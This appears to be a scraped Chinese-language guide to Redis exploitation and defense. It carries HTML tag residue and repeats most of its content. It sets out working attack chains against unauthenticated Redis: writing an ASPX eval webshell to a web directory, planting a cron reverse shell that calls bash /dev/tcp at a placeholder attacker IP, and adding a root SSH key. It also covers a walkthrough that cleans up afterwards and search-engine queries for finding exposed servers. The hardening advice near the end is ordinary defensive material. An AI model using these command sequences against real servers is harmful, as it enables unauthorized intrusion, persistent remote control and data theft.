Redis漏洞利用与防御全面指南<\/h1>

一、Redis简介与基础<\/h2>

Redis(Remote Dictionary Server)是一个开源的key-value存储系统，由Salvatore Sanfilippo开发，具有以下特点：<\/p>

使用ANSI C语言编写<\/li>
支持网络、基于内存亦可持久化<\/li>
提供多种数据结构：字符串(String)、哈希(Map)、列表(list)、集合(sets)和有序集合(sorted sets)<\/li>

默认端口：6379（Redis服务），26379（Sentinel配置器）<\/li> <\/ul>

实验环境搭建<\/h3>

下载安装（建议使用3.2.11版本进行漏洞测试）：<\/li> <\/ol>

wget http:\/\/download.redis.io\/releases\/redis-3.2.11.tar.gz
tar -xvf redis-3.2.11.tar.gz
cd redis-3.2.11
make
<\/code><\/pre>

修改配置文件(redis.conf)：<\/li>
<\/ol>
# 注释掉bind行
# bind 127.0.0.1

# 关闭保护模式
protected-mode no
<\/code><\/pre>

启动Redis：<\/li>
<\/ol>
.\/src\/redis-server redis.conf
<\/code><\/pre>
二、Redis常见命令<\/h2>



命令<\/th>
描述<\/th>
<\/tr>
<\/thead>


info<\/td>
查看Redis信息<\/td>
<\/tr>

flushall<\/td>
删除所有数据库内容<\/td>
<\/tr>

flushdb<\/td>
刷新当前数据库<\/td>
<\/tr>

KEYS *<\/td>
查看所有键<\/td>
<\/tr>

set test "value"<\/td>
设置变量<\/td>
<\/tr>

config set dir dirpath<\/td>
设置工作目录<\/td>
<\/tr>

save<\/td>
保存数据到磁盘<\/td>
<\/tr>

get key<\/td>
获取键值<\/td>
<\/tr>
<\/tbody>
<\/table>
三、Redis相关漏洞<\/h2>
1. 未授权访问漏洞<\/h3>

默认配置无认证，可导致敏感信息泄露<\/li>
可执行恶意命令如flushall清空所有数据<\/li>
可通过EVAL执行lua代码<\/li>
<\/ul>
2. 高危漏洞列表<\/h3>
CVE-2016-8339<\/strong>

Redis 3.2.x < 3.2.4版本缓冲区溢出漏洞，可导致任意代码执行<\/p>
CVE-2015-8080<\/strong>

Redis 2.8.x < 2.8.24和3.0.x < 3.0.6版本整数溢出漏洞，可绕过沙盒限制<\/p>
CVE-2015-4335<\/strong>

Redis < 2.8.1和3.x < 3.0.2版本eval命令执行漏洞<\/p>
CVE-2013-7458<\/strong>

读取".rediscli_history"配置文件信息漏洞<\/p>
四、Redis攻击技术详解<\/h2>
1. 内网探测<\/h3>
使用nmap扫描Redis服务：<\/p>
nmap -v -n -Pn -p 6379 -sV --script redis-info 192.168.56.1\/24
<\/code><\/pre>
2. 暴力破解<\/h3>
使用redis-sha-crack工具：<\/p>
node .\/redis-sha-crack.js -w wordlist.txt -s shalist.txt 127.0.0.1 host2.example.com:5555
<\/code><\/pre>
3. 获取Webshell<\/h3>
当Redis有web目录写权限时：<\/p>
config set dir E:\/www\/font
config set dbfilename redis2.aspx
set a "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"c\"],\"unsafe\");%>"
save
<\/code><\/pre>
4. 反弹Shell<\/h3>
set x "\n\n*bash -i >& \/dev\/tcp\/攻击者IP\/端口 0>&1\n\n"
config set dir \/var\/spool\/cron\/crontabs\/
config set dbfilename root
save
<\/code><\/pre>
5. SSH免密登录<\/h3>
ssh-keygen -t rsa
config set dir \/root\/.ssh\/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa 公钥内容\n\n\n"
save
<\/code><\/pre>
五、Redis漏洞利用实战案例<\/h2>
1. 非标准端口Redis发现<\/h3>
通过nmap扫描发现Redis运行在3357端口<\/p>
2. 认证登录<\/h3>
telnet 目标IP 3357
auth 密码
<\/code><\/pre>
3. 获取Webshell完整流程<\/h3>

查看当前配置：<\/li>
<\/ol>
config get dir
config get dbfilename
<\/code><\/pre>

设置Web目录和文件名：<\/li>
<\/ol>
config set dir E:\/www\/
config set dbfilename redis2.aspx
<\/code><\/pre>

写入Webshell：<\/li>
<\/ol>
set a "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"c\"],\"unsafe\");%>"
save
<\/code><\/pre>

恢复原始配置：<\/li>
<\/ol>
config set dir 原目录
config set dbfilename 原文件名
del a
flushdb
<\/code><\/pre>
六、入侵检测与防御<\/h2>
入侵检测方法<\/h3>

检查异常key：<\/li>
<\/ol>
keys *
get 可疑key名
<\/code><\/pre>

Linux系统检查：<\/li>
<\/ol>

查看\/root\/.ssh\/authorized_keys是否被修改<\/li>
检查是否存在异常cron任务<\/li>
<\/ul>

Webshell扫描：<\/li>
<\/ol>

检查网站目录是否存在Redis相关webshell<\/li>
<\/ul>
安全加固措施<\/h3>

网络层防护：<\/li>
<\/ol>

防火墙禁用6379端口<\/li>
修改Redis默认端口<\/li>
<\/ul>

认证配置：<\/li>
<\/ol>
# 修改redis.conf
requirepass 强密码
<\/code><\/pre>

访问控制：<\/li>
<\/ol>
# 限制绑定IP
bind 内网IP
<\/code><\/pre>

命令重命名\/禁用：<\/li>
<\/ol>
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command FLUSHDB ""
rename-command EVAL ""
<\/code><\/pre>

其他安全措施：<\/li>
<\/ol>

使用低权限用户运行Redis<\/li>
定期备份重要数据<\/li>
保持Redis版本更新<\/li>
<\/ul>
七、参考工具与资源<\/h2>

漏洞扫描工具：<\/li>
<\/ol>

nmap Redis检测脚本<\/li>
Metasploit Redis模块<\/li>
<\/ul>

暴力破解工具：<\/li>
<\/ol>

redis-sha-crack (GitHub)<\/li>
<\/ul>

搜索引擎：<\/li>
<\/ol>

ZoomEye: port:6379<\/code><\/li>
FOFA: port="6379" && protocol==redis<\/code><\/li>
<\/ul>

参考文档：<\/li>
<\/ol>

Redis官方文档: https:\/\/redis.io\/<\/li>
Redis命令参考: https:\/\/www.cnblogs.com\/kongzhongqijing\/p\/6867960.html<\/li>
<\/ul>
通过以上全面的安全措施，可以有效防御Redis相关的安全风险，保护系统免受攻击。<\/p>

命令<\/th>	描述<\/th> <\/tr> <\/thead>
info<\/td>	查看Redis信息<\/td> <\/tr>
flushall<\/td>	删除所有数据库内容<\/td> <\/tr>
flushdb<\/td>	刷新当前数据库<\/td> <\/tr>
KEYS *<\/td>	查看所有键<\/td> <\/tr>
set test "value"<\/td>	设置变量<\/td> <\/tr>
config set dir dirpath<\/td>	设置工作目录<\/td> <\/tr>
save<\/td>	保存数据到磁盘<\/td> <\/tr>
get key<\/td>	获取键值<\/td> <\/tr> <\/tbody> <\/table> 三、Redis相关漏洞<\/h2> 1. 未授权访问漏洞<\/h3> 默认配置无认证，可导致敏感信息泄露<\/li> 可执行恶意命令如flushall清空所有数据<\/li> 可通过EVAL执行lua代码<\/li> <\/ul> 2. 高危漏洞列表<\/h3> CVE-2016-8339<\/strong> Redis 3.2.x < 3.2.4版本缓冲区溢出漏洞，可导致任意代码执行<\/p> CVE-2015-8080<\/strong> Redis 2.8.x < 2.8.24和3.0.x < 3.0.6版本整数溢出漏洞，可绕过沙盒限制<\/p> CVE-2015-4335<\/strong> Redis < 2.8.1和3.x < 3.0.2版本eval命令执行漏洞<\/p> CVE-2013-7458<\/strong> 读取".rediscli_history"配置文件信息漏洞<\/p> 四、Redis攻击技术详解<\/h2> 1. 内网探测<\/h3> 使用nmap扫描Redis服务：<\/p> nmap -v -n -Pn -p 6379 -sV --script redis-info 192.168.56.1\/24 <\/code><\/pre> 2. 暴力破解<\/h3> 使用redis-sha-crack工具：<\/p> node .\/redis-sha-crack.js -w wordlist.txt -s shalist.txt 127.0.0.1 host2.example.com:5555 <\/code><\/pre> 3. 获取Webshell<\/h3> 当Redis有web目录写权限时：<\/p> config set dir E:\/www\/font config set dbfilename redis2.aspx set a "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"c\"],\"unsafe\");%>" save <\/code><\/pre> 4. 反弹Shell<\/h3> set x "\n\nbash -i >& \/dev\/tcp\/攻击者IP\/端口 0>&1\n\n" config set dir \/var\/spool\/cron\/crontabs\/ config set dbfilename root save <\/code><\/pre> 5. SSH免密登录<\/h3> ssh-keygen -t rsa config set dir \/root\/.ssh\/ config set dbfilename authorized_keys set x "\n\n\nssh-rsa 公钥内容\n\n\n" save <\/code><\/pre> 五、Redis漏洞利用实战案例<\/h2> 1. 非标准端口Redis发现<\/h3> 通过nmap扫描发现Redis运行在3357端口<\/p> 2. 认证登录<\/h3> telnet 目标IP 3357 auth 密码 <\/code><\/pre> 3. 获取Webshell完整流程<\/h3> 查看当前配置：<\/li> <\/ol> config get dir config get dbfilename <\/code><\/pre> 设置Web目录和文件名：<\/li> <\/ol> config set dir E:\/www\/ config set dbfilename redis2.aspx <\/code><\/pre> 写入Webshell：<\/li> <\/ol> set a "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"c\"],\"unsafe\");%>" save <\/code><\/pre> 恢复原始配置：<\/li> <\/ol> config set dir 原目录 config set dbfilename 原文件名 del a flushdb <\/code><\/pre> 六、入侵检测与防御<\/h2> 入侵检测方法<\/h3> 检查异常key：<\/li> <\/ol> keys get 可疑key名 <\/code><\/pre> Linux系统检查：<\/li> <\/ol> 查看\/root\/.ssh\/authorized_keys是否被修改<\/li> 检查是否存在异常cron任务<\/li> <\/ul> Webshell扫描：<\/li> <\/ol> 检查网站目录是否存在Redis相关webshell<\/li> <\/ul> 安全加固措施<\/h3> 网络层防护：<\/li> <\/ol> 防火墙禁用6379端口<\/li> 修改Redis默认端口<\/li> <\/ul> 认证配置：<\/li> <\/ol> # 修改redis.conf requirepass 强密码 <\/code><\/pre> 访问控制：<\/li> <\/ol> # 限制绑定IP bind 内网IP <\/code><\/pre> 命令重命名\/禁用：<\/li> <\/ol> rename-command CONFIG "" rename-command FLUSHALL "" rename-command FLUSHDB "" rename-command EVAL "" <\/code><\/pre> 其他安全措施：<\/li> <\/ol> 使用低权限用户运行Redis<\/li> 定期备份重要数据<\/li> 保持Redis版本更新<\/li> <\/ul> 七、参考工具与资源<\/h2> 漏洞扫描工具：<\/li> <\/ol> nmap Redis检测脚本<\/li> Metasploit Redis模块<\/li> <\/ul> 暴力破解工具：<\/li> <\/ol> redis-sha-crack (GitHub)<\/li> <\/ul> 搜索引擎：<\/li> <\/ol> ZoomEye: port:6379<\/code><\/li> FOFA: port="6379" && protocol==redis<\/code><\/li> <\/ul> 参考文档：<\/li> <\/ol> Redis官方文档: https:\/\/redis.io\/<\/li> Redis命令参考: https:\/\/www.cnblogs.com\/kongzhongqijing\/p\/6867960.html<\/li> <\/ul> 通过以上全面的安全措施，可以有效防御Redis相关的安全风险，保护系统免受攻击。<\/p>

Redis漏洞利用与防御全面指南<\/h1>

三、Redis相关漏洞<\/h2>

五、Redis漏洞利用实战案例<\/h2>

1. 非标准端口Redis发现<\/h3> 通过nmap扫描发现Redis运行在3357端口<\/p>

六、入侵检测与防御<\/h2>

1. 非标准端口Redis发现<\/h3>
通过nmap扫描发现Redis运行在3357端口<\/p>